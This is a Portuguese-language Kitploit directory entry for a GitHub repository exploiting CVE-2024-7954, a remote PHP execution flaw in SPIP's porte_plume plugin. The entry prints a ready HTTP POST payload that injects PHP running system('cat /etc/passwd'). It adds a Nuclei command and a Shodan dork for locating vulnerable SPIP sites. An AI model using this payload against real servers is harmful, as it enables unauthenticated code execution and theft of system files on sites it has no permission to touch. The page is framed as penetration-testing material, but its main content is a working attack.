Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RCE_CVE-2024-7954 | Kitploit
Ferramentas/GitHubGitHub/thecyberguy-17/rce_cve-2024-7954
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubthecyberguy-17/rce_cve-2024-7954

RCE_CVE-2024-7954

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

RCE_CVE-2024-7954

Descrição:

O plugin porte_plume usado pelo SPIP antes das versões 4.30-alpha2, 4.2.13 e 4.1.16 está vulnerável a uma vulnerabilidade de execução de código arbitrário. Um atacante remoto e não autenticado pode executar PHP arbitrário como o usuário do SPIP enviando uma requisição HTTP forjada. (CRÍTICA)

Exploração:

POST /index.php?action=porte_plume_previsu HTTP/1.1

Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

Ferramenta Utilizada:

Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml

Shodan Dork:

app="SPIP"

Referência:

1) https://github.com/fa-rrel
Baixar ferramenta